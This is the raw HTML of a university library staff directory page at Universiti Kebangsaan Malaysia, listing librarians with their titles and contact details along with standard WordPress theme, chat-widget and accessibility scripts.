data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-medium">SITI DERWINA MOSTAPA</div> </div> </div> <div class="elementor-element elementor-element-cc502c3 elementor-widget elementor-widget-heading" data-id="cc502c3" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default"><span>Assistant Curator (S32)</span><span></span></div> </div> </div> <div class="elementor-element elementor-element-28f595c elementor-widget elementor-widget-text-editor" data-id="28f595c" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">derwina@ukm.edu.my</span><br /><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">03-8921 5842</span></p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-d2bbbc7" data-id="d2bbbc7" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> </div> </section> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-2c28fde elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="2c28fde" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-953f5d8" data-id="953f5d8" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-c9d60d1 elementor-widget elementor-widget-heading" data-id="c9d60d1" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">STUDY LEAVE</h2> </div> </div> <section class="elementor-section elementor-inner-section elementor-element elementor-element-c5cec5d elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="c5cec5d" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-7a0d30e" data-id="7a0d30e" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-d3840b7" data-id="d3840b7" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-87a0d83 elementor-widget elementor-widget-image" data-id="87a0d83" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="180" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1529-180x300.jpg" class="attachment-medium size-medium wp-image-1169" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1529-180x300.jpg 180w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1529-613x1024.jpg 613w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1529-768x1283.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1529-920x1536.jpg 920w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1529-1226x2048.jpg 1226w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1529-scaled.jpg 1533w" sizes="(max-width: 180px) 100vw, 180px" /> </div> </div> <div class="elementor-element elementor-element-f3111f4 elementor-widget elementor-widget-heading" data-id="f3111f4" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Hendon Abdullah </h3> </div> </div> <div class="elementor-element elementor-element-cd52337 elementor-widget elementor-widget-heading" data-id="cd52337" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Senior Librarian (S44)</div> </div> </div> <div class="elementor-element elementor-element-5e3916c elementor-widget elementor-widget-text-editor" data-id="5e3916c" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>hendon.abd@ukm.edu.my<br />B.Sc. (Hons) Information Studies (UiTM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-e89cc86" data-id="e89cc86" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> </div> </section> </div> </div> </div> </section> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-9abf170 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="9abf170" data-element_type="section" data-settings="{"background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-392d65f0" data-id="392d65f0" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-5e7f005d elementor-widget elementor-widget-heading" data-id="5e7f005d" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Contact Us</h2> </div> </div> <div class="elementor-element elementor-element-7d6c414b elementor-widget elementor-widget-text-editor" data-id="7d6c414b" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>Tun Seri Lanang Library, <br />Universiti Kebangsaan Malaysia<br />43600 Bangi, Selangor Darul Ehsan, Malaysia<br />603-89213446 / 019-2045652 (Telegram/Whatsapp) <br />603-89256067 (FAKS)</p> </div> </div> <div class="elementor-element elementor-element-5811ff83 elementor-shape-rounded elementor-grid-0 e-grid-align-center elementor-widget elementor-widget-social-icons" data-id="5811ff83" data-element_type="widget" data-widget_type="social-icons.default"> <div class="elementor-widget-container"> <div class="elementor-social-icons-wrapper elementor-grid"> <span class="elementor-grid-item"> <a class="elementor-icon elementor-social-icon elementor-social-icon-facebook elementor-repeater-item-f1e2030" href="https://www.facebook.com/ptslukm/" target="_blank"> <span class="elementor-screen-only">Facebook</span> <i class="fab fa-facebook"></i> </a> </span> <span class="elementor-grid-item"> <a class="elementor-icon elementor-social-icon elementor-social-icon-twitter elementor-repeater-item-7684840" target="_blank"> <span class="elementor-screen-only">Twitter</span> <i class="fab fa-twitter"></i> </a> </span> <span class="elementor-grid-item"> <a class="elementor-icon elementor-social-icon elementor-social-icon-youtube elementor-repeater-item-5f7b65b" target="_blank"> <span class="elementor-screen-only">Youtube</span> <i class="fab fa-youtube"></i> </a> </span> </div> </div> </div> <div class="elementor-element elementor-element-cac7cc3 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="cac7cc3" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-1600c665" data-id="1600c665" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-272230dd elementor-widget elementor-widget-image" data-id="272230dd" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="300" height="200" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/06/7H7A3663_1-300x200.jpg" class="attachment-medium size-medium wp-image-129" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/06/7H7A3663_1-300x200.jpg 300w, https://www.ukm.my/ptsl/wp-content/uploads/2020/06/7H7A3663_1-1024x683.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/06/7H7A3663_1-768x512.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/06/7H7A3663_1-1536x1024.jpg 1536w, https://www.ukm.my/ptsl/wp-content/uploads/2020/06/7H7A3663_1-2048x1365.jpg 2048w" sizes="(max-width: 300px) 100vw, 300px" /> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-4d8e199a" data-id="4d8e199a" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-6544a5df elementor-widget elementor-widget-image" data-id="6544a5df" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="300" height="200" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A3654_1-300x200.jpg" class="attachment-medium size-medium wp-image-900" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A3654_1-300x200.jpg 300w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A3654_1-1024x683.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A3654_1-768x512.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A3654_1-1536x1024.jpg 1536w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A3654_1-2048x1365.jpg 2048w" sizes="(max-width: 300px) 100vw, 300px" /> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-59cd8f4d elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="59cd8f4d" data-element_type="section" data-settings="{"background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1b236b6e" data-id="1b236b6e" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <section class="elementor-section elementor-inner-section elementor-element elementor-element-67f32f46 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="67f32f46" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-4abef8bc" data-id="4abef8bc" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-51815d28 elementor-align-right envato-kit-80-cta elementor-widget elementor-widget-button" data-id="51815d28" data-element_type="widget" data-widget_type="button.default"> <div class="elementor-widget-container"> <div class="elementor-button-wrapper"> <a class="elementor-button elementor-button-link elementor-size-sm" href="#"> <span class="elementor-button-content-wrapper"> <span class="elementor-button-text">Perpustakaan Pemangkin Masyarakat Berilmu</span> </span> </a> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-1ad756e0" data-id="1ad756e0" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-6074e6e0 elementor-view-default elementor-widget elementor-widget-icon" data-id="6074e6e0" data-element_type="widget" data-widget_type="icon.default"> <div class="elementor-widget-container"> <div class="elementor-icon-wrapper"> <a class="elementor-icon" href="#"> <i class="fa fa-forward" aria-hidden="true"></i> </a> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </section> </div> </main><!-- #main --> <footer id="footer" class="site-footer" itemscope="itemscope" itemtype="https://schema.org/WPFooter" role="contentinfo"> <div id="footer-inner" class="clr"> <div id="footer-widgets" class="oceanwp-row clr"> <div class="footer-widgets-inner container"> <div class="footer-box span_1_of_4 col col-1"> </div><!-- .footer-one-box --> <div class="footer-box span_1_of_4 col col-2"> </div><!-- .footer-one-box --> <div class="footer-box span_1_of_4 col col-3 "> </div><!-- .footer-one-box --> <div class="footer-box span_1_of_4 col col-4"> </div><!-- .footer-box --> </div><!-- .container --> </div><!-- #footer-widgets --> <div id="footer-bottom" class="clr no-footer-nav"> <div id="footer-bottom-inner" class="container clr"> <div id="copyright" class="clr" role="contentinfo"> Copyright 漏 The National University of Malaysia Library </div><!-- #copyright --> </div><!-- #footer-bottom-inner --> </div><!-- #footer-bottom --> </div><!-- #footer-inner --> </footer><!-- #footer --> </div><!-- #wrap --> </div><!-- #outer-wrap --> <a aria-label="Scroll to the top of the page" href="#" id="scroll-top" class="scroll-top-right"><i class=" fa fa-angle-up" aria-hidden="true" role="img"></i></a> <!--Start of Tawk.to Script (0.8.6)--> <script id="tawk-script" type="text/javascript"> var Tawk_API = Tawk_API || {}; var Tawk_LoadStart=new Date(); (function(){ var s1 = document.createElement( 'script' ),s0=document.getElementsByTagName( 'script' )[0]; s1.async = true; s1.src = 'https://embed.tawk.to/5fd081bfa1d54c18d8f1d89f/default'; s1.charset = 'UTF-8'; s1.setAttribute( 'crossorigin','*' ); s0.parentNode.insertBefore( s1, s0 ); })(); </script> <!--End of Tawk.to Script (0.8.6)--> <div id="wp_access_helper_container" class="accessability_container dark_theme"> <!-- WP Accessibility Helper (WAH) - https://wordpress.org/plugins/wp-accessibility-helper/ --> <!-- Official plugin website - https://accessibility-helper.co.il --> <button type="button" class="wahout aicon_link" accesskey="z" aria-label="Accessibility Helper sidebar" title="Accessibility Helper sidebar"> <img src="https://www.ukm.my/ptsl/wp-content/plugins/wp-accessibility-helper/assets/images/accessibility-48.jpg" alt="Accessibility" class="aicon_image" /> </button> <div id="access_container" aria-hidden="true"> <button tabindex="-1" type="button" class="close_container wahout" accesskey="x" aria-label="Close" title="Close"> Close </button> <div class="access_container_inner"> <div class="a_module wah_font_resize"> <div class="a_module_title">Font size</div> <div class="a_module_exe font_resizer"> <button tabindex="-1" type="button" class="wah-action-button smaller wahout" title="smaller font size" aria-label="smaller font size">A-</button> <button tabindex="-1" type="button" class="wah-action-button larger wahout" title="larger font size" aria-label="larger font size">A+</button><button tabindex="-1" type="button" class="wah-action-button wah-font-reset wahout" title="Reset font size" aria-label="Reset font size">Reset</button> </div> </div><div class="a_module wah_keyboard_navigation"> <div class="a_module_exe"> <button tabindex="-1" type="button" class="wah-action-button wahout wah-call-keyboard-navigation" aria-label="Keyboard navigation" title="Keyboard navigation">Keyboard navigation</button> </div> </div><div class="a_module wah_readable_fonts"> <div class="a_module_exe readable_fonts"> <button tabindex="-1" type="button" class="wah-action-button wahout wah-call-readable-fonts" aria-label="Readable Font" title="Readable Font">Readable Font</button> </div> </div><div class="a_module wah_contrast_trigger"> <div class="a_module_title">Colors</div> <div class="a_module_exe"> <button tabindex="-1" type="button" id="contrast_trigger" class="contrast_trigger wah-action-button wahout wah-call-contrast-trigger" title="Contrast">Choose color</button> <div class="color_selector" aria-hidden="true"> <button type="button" class="convar black wahout" data-bgcolor="#000" data-color="#FFF" title="black">black</button> <button type="button" class="convar white wahout" data-bgcolor="#FFF" data-color="#000" title="white">white</button> <button type="button" class="convar green wahout" data-bgcolor="#00FF21" data-color="#000" title="green">green</button> <button type="button" class="convar blue wahout" data-bgcolor="#0FF" data-color="#000" title="blue">blue</button> <button type="button" class="convar red wahout" data-bgcolor="#F00" data-color="#000" title="red">red</button> <button type="button" class="convar orange wahout" data-bgcolor="#FF6A00" data-color="#000" title="orange">orange</button> <button type="button" class="convar yellow wahout" data-bgcolor="#FFD800" data-color="#000" title="yellow">yellow</button> <button type="button" class="convar navi wahout" data-bgcolor="#B200FF" data-color="#000" title="navi">navi</button> </div> </div> </div><div class="a_module wah_underline_links"> <div class="a_module_exe"> <button tabindex="-1" type="button" class="wah-action-button wahout wah-call-underline-links" aria-label="Underline links" title="Underline links">Underline links</button> </div> </div><div class="a_module wah_highlight_links"> <div class="a_module_exe"> <button tabindex="-1" type="button" class="wah-action-button wahout wah-call-highlight-links" aria-label="Highlight Links" title="Highlight Links">Highlight Links</button> </div> </div><div class="a_module wah_clear_cookies"> <div class="a_module_exe"> <button tabindex="-1" type="button" class="wah-action-button wahout wah-call-clear-cookies" aria-label="Clear cookies" title="Clear cookies">Clear cookies</button> </div> </div><div class="a_module wah_greyscale"> <div class="a_module_exe"> <button tabindex="-1" type="button" id="greyscale" class="greyscale wah-action-button wahout wah-call-greyscale" aria-label="Images Greyscale" title="Images Greyscale">Images Greyscale</button> </div> </div><div class="a_module wah_invert"> <div class="a_module_exe"> <button tabindex="-1" type="button" class="wah-action-button wahout wah-call-invert" aria-label="Invert Colors" title="Invert Colors">Invert Colors</button> </div> </div><div class="a_module wah_remove_animations"> <div class="a_module_exe"> <button tabindex="-1" type="button" class="wah-action-button wahout wah-call-remove-animations" aria-label="Remove Animations" title="Remove Animations">Remove Animations</button> </div> </div> <button type="button" title="Close sidebar" class="wah-skip close-wah-sidebar"> Close </button> </div> </div> <script type="text/javascript"> var roleLink = 1; var removeLinkTitles = 1; </script> <style> @media only screen and (max-width: 480px) {div#wp_access_helper_container {display: none;}} </style> <div class="wah-free-credits"> <div class="wah-free-credits-inner"> <a href="https://accessibility-helper.co.il/" target="_blank" title="Accessibility by WP Accessibility Helper Team">Accessibility by WAH</a> </div> </div> <!-- WP Accessibility Helper. Created by Alex Volkov. --> </div> <script type='text/javascript'> const lazyloadRunObserver = () => { const lazyloadBackgrounds = document.querySelectorAll( `.e-con.e-parent:not(.e-lazyloaded)` ); const lazyloadBackgroundObserver = new IntersectionObserver( ( entries ) => { entries.forEach( ( entry ) => { if ( entry.isIntersecting ) { let lazyloadBackground = entry.target; if( lazyloadBackground ) { lazyloadBackground.classList.add( 'e-lazyloaded' ); } lazyloadBackgroundObserver.unobserve( entry.target ); } }); }, { rootMargin: '200px 0px 200px 0px' } ); lazyloadBackgrounds.forEach( ( lazyloadBackground ) => { lazyloadBackgroundObserver.observe( lazyloadBackground ); } ); }; const events = [ 'DOMContentLoaded', 'elementor/lazyload/observe', ]; events.forEach( ( event ) => { document.addEventListener( event, lazyloadRunObserver ); } ); </script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wp-accessibility-helper/assets/js/wp-accessibility-helper.min.js?ver=1.0.0" id="wp-accessibility-helper-js"></script> <script id="wpvr-js-extra"> var wpvr_public = {"notice_active":"","notice":""}; </script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/js/wpvr-public.js?ver=8.5.8" id="wpvr-js"></script> <script id="eac-frontend-js-before"> var eacElementsPath = {"proxies":"https:\/\/www.ukm.my\/ptsl\/wp-content\/plugins\/elementor-addon-components\/includes\/proxy\/","pdfJs":"https:\/\/www.ukm.my\/ptsl\/wp-content\/plugins\/elementor-addon-components\/assets\/js\/pdfjs\/","osmImages":"https:\/\/www.ukm.my\/ptsl\/wp-content\/plugins\/elementor-addon-components\/assets\/images\/","osmConfig":"https:\/\/www.ukm.my\/ptsl\/wp-content\/plugins\/elementor-addon-components\/includes\/config\/osm\/"} </script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/elementor-addon-components/assets/js/eac-frontend.min.js?ver=2.2.8" id="eac-frontend-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/elementor-addon-components/assets/js/fancybox/jquery.fancybox.min.js?ver=3.5.7" id="eac-fancybox-js" defer data-wp-strategy="defer"></script> <script src="https://www.ukm.my/ptsl/wp-includes/js/imagesloaded.min.js?ver=5.0.0" id="imagesloaded-js"></script> <script id="oceanwp-main-js-extra"> var oceanwpLocalize = {"nonce":"08bfa6c265","isRTL":"","menuSearchStyle":"drop_down","mobileMenuSearchStyle":"disabled","sidrSource":null,"sidrDisplace":"1","sidrSide":"left","sidrDropdownTarget":"link","verticalHeaderTarget":"link","customScrollOffset":"0","customSelects":".woocommerce-ordering .orderby, #dropdown_product_cat, .widget_categories select, .widget_archive select, .single-product .variations_form .variations select"}; </script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/theme.min.js?ver=4.0.2" id="oceanwp-main-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/drop-down-mobile-menu.min.js?ver=4.0.2" id="oceanwp-drop-down-mobile-menu-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/drop-down-search.min.js?ver=4.0.2" id="oceanwp-drop-down-search-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/vendors/magnific-popup.min.js?ver=4.0.2" id="ow-magnific-popup-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/ow-lightbox.min.js?ver=4.0.2" id="oceanwp-lightbox-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/vendors/flickity.pkgd.min.js?ver=4.0.2" id="ow-flickity-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/ow-slider.min.js?ver=4.0.2" id="oceanwp-slider-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/scroll-effect.min.js?ver=4.0.2" id="oceanwp-scroll-effect-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/scroll-top.min.js?ver=4.0.2" id="oceanwp-scroll-top-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/select.min.js?ver=4.0.2" id="oceanwp-select-js"></script> <script id="eael-general-js-extra"> var localize = {"ajaxurl":"https:\/\/www.ukm.my\/ptsl\/wp-admin\/admin-ajax.php","nonce":"cbe8981d42","i18n":{"added":"Added ","compare":"Compare","loading":"Loading..."},"eael_translate_text":{"required_text":"is a required field","invalid_text":"Invalid","billing_text":"Billing","shipping_text":"Shipping","fg_mfp_counter_text":"of"},"page_permalink":"https:\/\/www.ukm.my\/ptsl\/?page_id=378","cart_redirectition":"","cart_page_url":"","el_breakpoints":{"mobile":{"label":"Mobile Portrait","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Landscape","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet Portrait","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet Landscape","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Laptop","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Widescreen","value":2400,"default_value":2400,"direction":"min","is_enabled":false}}}; </script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/essential-addons-for-elementor-lite/assets/front-end/js/view/general.min.js?ver=6.0.10" id="eael-general-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.25.9" id="elementor-webpack-runtime-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.25.9" id="elementor-frontend-modules-js"></script> <script src="https://www.ukm.my/ptsl/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3" id="jquery-ui-core-js"></script> <script id="elementor-frontend-js-before"> var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Share on Facebook","shareOnTwitter":"Share on Twitter","pinIt":"Pin it","download":"Download","downloadImage":"Download image","fullscreen":"Fullscreen","zoom":"Zoom","share":"Share","playVideo":"Play Video","previous":"Previous","next":"Next","close":"Close","a11yCarouselWrapperAriaLabel":"Carousel | Horizontal scrolling: Arrow Left & Right","a11yCarouselPrevSlideMessage":"Previous slide","a11yCarouselNextSlideMessage":"Next slide","a11yCarouselFirstSlideMessage":"This is the first slide","a11yCarouselLastSlideMessage":"This is the last slide","a11yCarouselPaginationBulletMessage":"Go to slide"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"Mobile Portrait","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Landscape","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet Portrait","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet Landscape","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Laptop","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Widescreen","value":2400,"default_value":2400,"direction":"min","is_enabled":false}},"hasCustomBreakpoints":false},"version":"3.25.9","is_static":false,"experimentalFeatures":{"additional_custom_breakpoints":true,"container":true,"e_swiper_latest":true,"e_nested_atomic_repeaters":true,"e_optimized_control_loading":true,"e_onboarding":true,"e_css_smooth_scroll":true,"home_screen":true,"landing-pages":true,"nested-elements":true,"editor_v2":true,"link-in-bio":true,"floating-buttons":true},"urls":{"assets":"https:\/\/www.ukm.my\/ptsl\/wp-content\/plugins\/elementor\/assets\/","ajaxurl":"https:\/\/www.ukm.my\/ptsl\/wp-admin\/admin-ajax.php","uploadUrl":"https:\/\/www.ukm.my\/ptsl\/wp-content\/uploads"},"nonces":{"floatingButtonsClickTracking":"bbea2f8679"},"swiperClass":"swiper","settings":{"page":[],"editorPreferences":[]},"kit":{"active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_description_src":"description"},"post":{"id":378,"title":"librarians-bi%20%E2%80%93%20ptsl","excerpt":"","featuredImage":false}}; </script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.25.9" id="elementor-frontend-js"></script> </body> </html>